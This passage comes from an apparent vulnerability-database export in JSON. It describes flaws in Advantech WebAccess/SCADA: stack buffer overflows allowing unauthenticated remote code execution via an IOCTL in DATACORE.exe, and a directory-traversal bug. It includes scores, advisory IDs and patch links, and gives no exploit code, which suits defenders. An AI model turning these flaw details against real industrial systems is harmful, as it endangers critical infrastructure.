}, { "db": "NVD", "id": "CVE-2020-12002" } ] }, "description": { "_id": null, "data": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple stack-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution. Advantech WebAccess Node Is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x00005241 in DATACORE.exe. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required. The vulnerability is due to the fact that the program does not correctly verify the length of the data submitted by the user", "sources": [ { "db": "NVD", "id": "CVE-2020-12002" }, { "db": "JVNDB", "id": "JVNDB-2020-005161" }, { "db": "ZDI", "id": "ZDI-20-625" }, { "db": "ZDI", "id": "ZDI-20-591" }, { "db": "ZDI", "id": "ZDI-20-634" }, { "db": "ZDI", "id": "ZDI-20-624" }, { "db": "ZDI", "id": "ZDI-20-590" }, { "db": "ZDI", "id": "ZDI-20-592" }, { "db": "ZDI", "id": "ZDI-20-622" }, { "db": "ZDI", "id": "ZDI-20-619" }, { "db": "ZDI", "id": "ZDI-20-633" }, { "db": "CNVD", "id": "CNVD-2020-29740" }, { "db": "IVD", "id": "fafb27eb-2f95-48b4-b412-633e1702e89e" }, { "db": "IVD", "id": "d30ffcd7-838b-4bfa-b622-12761ec4a16f" }, { "db": "VULHUB", "id": "VHN-164637" }, { "db": "VULMON", "id": "CVE-2020-12002" } ], "trust": 8.37 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2020-12002", "trust": 9.9 }, { "db": "ICS CERT", "id": "ICSA-20-128-01", "trust": 3.2 }, { "db": "ZDI", "id": "ZDI-20-625", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-591", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-634", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-624", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-590", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-592", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-622", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-619", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-633", "trust": 2.5 }, { "db": "CNVD", "id": "CNVD-2020-29740", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-202005-298", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU93292753", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2020-005161", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10339", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9996", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10080", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10338", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9987", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9906", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10086", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10025", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10079", "trust": 0.7 }, { "db": "NSFOCUS", "id": "47354", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.1646", "trust": 0.6 }, { "db": "IVD", "id": "FAFB27EB-2F95-48B4-B412-633E1702E89E", "trust": 0.2 }, { "db": "IVD", "id": "D30FFCD7-838B-4BFA-B622-12761EC4A16F", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-164637", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2020-12002", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "fafb27eb-2f95-48b4-b412-633e1702e89e" }, { "db": "IVD", "id": "d30ffcd7-838b-4bfa-b622-12761ec4a16f" }, { "db": "ZDI", "id": "ZDI-20-625" }, { "db": "ZDI", "id": "ZDI-20-591" }, { "db": "ZDI", "id": "ZDI-20-634" }, { "db": "ZDI", "id": "ZDI-20-624" }, { "db": "ZDI", "id": "ZDI-20-590" }, { "db": "ZDI", "id": "ZDI-20-592" }, { "db": "ZDI", "id": "ZDI-20-622" }, { "db": "ZDI", "id": "ZDI-20-619" }, { "db": "ZDI", "id": "ZDI-20-633" }, { "db": "CNVD", "id": "CNVD-2020-29740" }, { "db": "VULHUB", "id": "VHN-164637" }, { "db": "VULMON", "id": "CVE-2020-12002" }, { "db": "JVNDB", "id": "JVNDB-2020-005161" }, { "db": "CNNVD", "id": "CNNVD-202005-298" }, { "db": "NVD", "id": "CVE-2020-12002" } ] }, "id": "VAR-202005-0334", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "fafb27eb-2f95-48b4-b412-633e1702e89e" }, { "db": "IVD", "id": "d30ffcd7-838b-4bfa-b622-12761ec4a16f" }, { "db": "CNVD", "id": "CNVD-2020-29740" }, { "db": "VULHUB", "id": "VHN-164637" } ], "trust": 1.679503486666667 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "fafb27eb-2f95-48b4-b412-633e1702e89e" }, { "db": "IVD", "id": "d30ffcd7-838b-4bfa-b622-12761ec4a16f" }, { "db": "CNVD", "id": "CNVD-2020-29740" } ] }, "last_update_date": "2024-11-23T21:59:18.713000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 6.3, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "title": "Top Page", "trust": 0.8, "url": "https://www.advantech.com/" }, { "title": "Patch for Advantech WebAccess Node buffer overflow vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/218847" }, { "title": "Advantech WebAccess Node Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=118650" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-625" }, { "db": "ZDI", "id": "ZDI-20-591" }, { "db": "ZDI", "id": "ZDI-20-634" }, { "db": "ZDI", "id": "ZDI-20-624" }, { "db": "ZDI", "id": "ZDI-20-590" }, { "db": "ZDI", "id": "ZDI-20-592" }, { "db": "ZDI", "id": "ZDI-20-622" }, { "db": "ZDI", "id": "ZDI-20-619" }, { "db": "ZDI", "id": "ZDI-20-633" }, { "db": "CNVD", "id": "CNVD-2020-29740" }, { "db": "JVNDB", "id": "JVNDB-2020-005161" }, { "db": "CNNVD", "id": "CNNVD-202005-298" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-787", "trust": 1.9 }, { "problemtype": "CWE-121", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-164637" }, { "db": "JVNDB", "id": "JVNDB-2020-005161" }, { "db": "NVD", "id": "CVE-2020-12002" } ] }, "references": { "_id": null, "data": [ { "trust": 6.3, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "trust": 3.8, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "trust": 2.4, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-634/" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-590/" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-591/" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-592/" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-619/" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-622/" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-624/" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-625/" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-633/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12002" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12002" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu93292753/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.1646/" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/47354" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/787.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/181597" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-625" }, { "db": "ZDI", "id": "ZDI-20-591" }, { "db": "ZDI", "id": "ZDI-20-634" }, { "db": "ZDI", "id": "ZDI-20-624" }, { "db": "ZDI", "id": "ZDI-20-590" }, { "db": "ZDI", "id": "ZDI-20-592" }, { "db": "ZDI", "id": "ZDI-20-622" }, { "db": "ZDI", "id": "ZDI-20-619" }, { "db": "ZDI", "id": "ZDI-20-633" }, { "db": "CNVD", "id": "CNVD-2020-29740" }, { "db": "VULHUB", "id": "VHN-164637" }, { "db": "VULMON", "id": "CVE-2020-12002" }, { "db": "JVNDB", "id": "JVNDB-2020-005161" }, { "db": "CNNVD", "id": "CNNVD-202005-298" }, { "db": "NVD", "id": "CVE-2020-12002" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "fafb27eb-2f95-48b4-b412-633e1702e89e", "ident": null }, { "db": "IVD", "id": "d30ffcd7-838b-4bfa-b622-12761ec4a16f", "ident": null }, { "db": "ZDI", "id": "ZDI-20-625", "ident": null }, { "db": "ZDI", "id": "ZDI-20-591", "ident": null }, { "db": "ZDI", "id": "ZDI-20-634", "ident": null }, { "db": "ZDI", "id": "ZDI-20-624", "ident": null }, { "db": "ZDI", "id": "ZDI-20-590", "ident": null }, { "db": "ZDI", "id": "ZDI-20-592", "ident": null }, { "db": "ZDI", "id": "ZDI-20-622", "ident": null }, { "db": "ZDI", "id": "ZDI-20-619", "ident": null }, { "db": "ZDI", "id": "ZDI-20-633", "ident": null }, { "db": "CNVD", "id": "CNVD-2020-29740", "ident": null }, { "db": "VULHUB", "id": "VHN-164637", "ident": null }, { "db": "VULMON", "id": "CVE-2020-12002", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2020-005161", "ident": null }, { "db": "CNNVD", "id": "CNNVD-202005-298", "ident": null }, { "db": "NVD", "id": "CVE-2020-12002", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "fafb27eb-2f95-48b4-b412-633e1702e89e", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "d30ffcd7-838b-4bfa-b622-12761ec4a16f", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-625", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-591", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-634", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-624", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-590", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-592", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-622", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-619", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-633", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29740", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULHUB", "id": "VHN-164637", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULMON", "id": "CVE-2020-12002", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005161", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-298", "ident": null }, { "date": "2020-05-08T12:15:11.113000", "db": "NVD", "id": "CVE-2020-12002", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-625", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-591", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-634", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-624", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-590", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-592", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-622", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-619", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-633", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29740", "ident": null }, { "date": "2021-09-23T00:00:00", "db": "VULHUB", "id": "VHN-164637", "ident": null }, { "date": "2020-05-12T00:00:00", "db": "VULMON", "id": "CVE-2020-12002", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005161", "ident": null }, { "date": "2021-01-04T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-298", "ident": null }, { "date": "2024-11-21T04:59:05.610000", "db": "NVD", "id": "CVE-2020-12002", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202005-298" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess/SCADA BwBacNetJ Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-20-634" }, { "db": "ZDI", "id": "ZDI-20-633" } ], "trust": 1.4 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "fafb27eb-2f95-48b4-b412-633e1702e89e" }, { "db": "IVD", "id": "d30ffcd7-838b-4bfa-b622-12761ec4a16f" }, { "db": "CNNVD", "id": "CNNVD-202005-298" } ], "trust": 1.0 } }
var-201601-0037
Vulnerability from variot
Directory traversal vulnerability in Advantech WebAccess before 8.1 allows remote attackers to list arbitrary virtual-directory files via unspecified vectors. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within the removeFile script allows unauthenticated callers to remove key system files, blocking WebAccess for all users. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. A heap-based buffer overflow vulnerability 6. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A remote-code execution vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences ('../') to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 3.5, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64dacb3e-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-125" }, { "db": "ZDI", "id": "ZDI-16-122" }, { "db": "ZDI", "id": "ZDI-16-126" }, { "db": "ZDI", "id": "ZDI-16-124" }, { "db": "ZDI", "id": "ZDI-16-123" }, { "db": "CNVD", "id": "CNVD-2016-00431" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001285" }, { "db": "CNNVD", "id": "CNNVD-201601-328" }, { "db": "NVD", "id": "CVE-2016-0855" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001285" } ] }, "credits": { "_id": null, "data": "rgod", "sources": [ { "db": "ZDI", "id": "ZDI-16-125" }, { "db": "ZDI", "id": "ZDI-16-122" }, { "db": "ZDI", "id": "ZDI-16-124" }, { "db": "ZDI", "id": "ZDI-16-123" } ], "trust": 2.8 }, "cve": "CVE-2016-0855", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2016-0855", "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 2.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2016-0855", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2016-0855", "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2016-00431", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "64dacb3e-2351-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-88365", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2016-0855", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2016-0855", "trust": 3.5, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2016-0855", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2016-0855", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2016-00431", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201601-328", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "64dacb3e-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-88365", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "64dacb3e-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-125" }, { "db": "ZDI", "id": "ZDI-16-122" }, { "db": "ZDI", "id": "ZDI-16-126" }, { "db": "ZDI", "id": "ZDI-16-124" }, { "db": "ZDI", "id": "ZDI-16-123" }, { "db": "CNVD", "id": "CNVD-2016-00431" }, { "db": "VULHUB", "id": "VHN-88365" }, { "db": "JVNDB", "id": "JVNDB-2016-001285" }, { "db": "CNNVD", "id": "CNNVD-201601-328" }, { "db": "NVD", "id": "CVE-2016-0855" } ] }, "description": { "_id": null, "data": "Directory traversal vulnerability in Advantech WebAccess before 8.1 allows remote attackers to list arbitrary virtual-directory files via unspecified vectors. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within the removeFile script allows unauthenticated callers to remove key system files, blocking WebAccess for all users. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. A heap-based buffer overflow vulnerability\n6. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A remote-code execution vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2016-0855" }, { "db": "JVNDB", "id": "JVNDB-2016-001285" }, { "db": "ZDI", "id": "ZDI-16-125" }, { "db": "ZDI", "id": "ZDI-16-122" }, { "db": "ZDI", "id": "ZDI-16-126" }, { "db": "ZDI", "id": "ZDI-16-124" }, { "db": "ZDI", "id": "ZDI-16-123" }, { "db": "CNVD", "id": "CNVD-2016-00431" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64dacb3e-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-88365" } ], "trust": 5.85 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2016-0855", "trust": 7.1 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 2.8 }, { "db": "ZDI", "id": "ZDI-16-125", "trust": 1.8 }, { "db": "ZDI", "id": "ZDI-16-122", "trust": 1.8 }, { "db": "ZDI", "id": "ZDI-16-126", "trust": 1.8 }, { "db": "ZDI", "id": "ZDI-16-124", "trust": 1.8 }, { "db": "ZDI", "id": "ZDI-16-123", "trust": 1.8 }, { "db": "CNNVD", "id": "CNNVD-201601-328", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00431", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001285", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3129", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3132", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3133", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3130", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3131", "trust": 0.7 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64DACB3E-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-88365", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64dacb3e-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-125" }, { "db": "ZDI", "id": "ZDI-16-122" }, { "db": "ZDI", "id": "ZDI-16-126" }, { "db": "ZDI", "id": "ZDI-16-124" }, { "db": "ZDI", "id": "ZDI-16-123" }, { "db": "CNVD", "id": "CNVD-2016-00431" }, { "db": "VULHUB", "id": "VHN-88365" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001285" }, { "db": "CNNVD", "id": "CNNVD-201601-328" }, { "db": "NVD", "id": "CVE-2016-0855" } ] }, "id": "VAR-201601-0037", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "64dacb3e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00431" }, { "db": "VULHUB", "id": "VHN-88365" } ], "trust": 1.33470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64dacb3e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00431" } ] }, "last_update_date": "2024-11-23T21:43:23.304000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 3.5, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech WebAccess Directory Traversal Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70377" }, { "title": "Advantech WebAccess Fixes for directory traversal vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59646" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-125" }, { "db": "ZDI", "id": "ZDI-16-122" }, { "db": "ZDI", "id": "ZDI-16-126" }, { "db": "ZDI", "id": "ZDI-16-124" }, { "db": "ZDI", "id": "ZDI-16-123" }, { "db": "CNVD", "id": "CNVD-2016-00431" }, { "db": "JVNDB", "id": "JVNDB-2016-001285" }, { "db": "CNNVD", "id": "CNNVD-201601-328" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-22", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88365" }, { "db": "JVNDB", "id": "JVNDB-2016-001285" }, { "db": "NVD", "id": "CVE-2016-0855" } ] }, "references": { "_id": null, "data": [ { "trust": 6.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0855" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-122" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-123" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-124" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-125" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-126" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0855" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-125" }, { "db": "ZDI", "id": "ZDI-16-122" }, { "db": "ZDI", "id": "ZDI-16-126" }, { "db": "ZDI", "id": "ZDI-16-124" }, { "db": "ZDI", "id": "ZDI-16-123" }, { "db": "CNVD", "id": "CNVD-2016-00431" }, { "db": "VULHUB", "id": "VHN-88365" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001285" }, { "db": "CNNVD", "id": "CNNVD-201601-328" }, { "db": "NVD", "id": "CVE-2016-0855" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": 